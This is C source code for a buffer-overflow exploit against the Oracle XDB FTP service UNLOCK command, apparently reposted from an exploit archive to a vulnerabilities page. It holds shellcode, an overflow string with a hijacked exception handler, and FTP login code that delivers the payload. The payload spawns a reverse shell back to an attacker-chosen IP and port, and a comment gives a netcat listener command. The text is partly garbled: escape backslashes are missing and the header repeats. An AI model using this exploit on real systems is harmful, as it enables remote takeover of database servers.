/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* /* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
unsigned char exploit[508]=
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";
char exception_handler[8]="x79x9Bxf7x77";
char short_jump[8]="xEBx06x90x90";
int main(int argc, char *argv[])
{
if(argc != 6)
{
printf("
Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf("
for Blackhat (http://www.blackhat.com)");
printf("
Spawns a reverse shell to specified port");
printf("
Usage: %s host userid password ipaddress port",argv[0]);
printf("
David Litchfield
(david@ngssoftware.com)");
printf("
6th July 2003
");
return 0;
}
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.
");
SetUpExploit(argv[4],atoi(argv[5]));
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"
");
GainControlOfOracle(argv[2],argv[3]);
return 0;
}
int SetUpExploit(char *myip, int myport)
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";
ip = inet_addr(myip);
ipt = (char*)&ip;
exploit[191]=ipt[0];
exploit[192]=ipt[1];
exploit[193]=ipt[2];
exploit[194]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons((unsigned short)myport);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[209]=prtt[0];
exploit[210]=prtt[1];
return 0;
}
int StartWinsock() {
int err=0; WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return 0; }
if (isalpha(host[0])) {
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
he = (struct hostent *)1;
}
if (he == NULL) {
return 0; }
return 1; }
int GainControlOfOracle(char *user, char *pass) {
char usercmd[260]="user ";
char passcmd[260]="pass ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;
strncat(usercmd,user,230);
strcat(usercmd,"
");
strncat(passcmd,pass,230);
strcat(passcmd,"
");
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);
s_sa.sin_port=htons((unsigned short)2100);
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp); ZeroMemory(resp,1600);
snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{ closesocket(sock);
return printf("Failed to log in using user %s and password %s.
",user,pass);
}
ZeroMemory(resp,1600);
snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
Oracle XDB FTP Service UNLOCK Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 434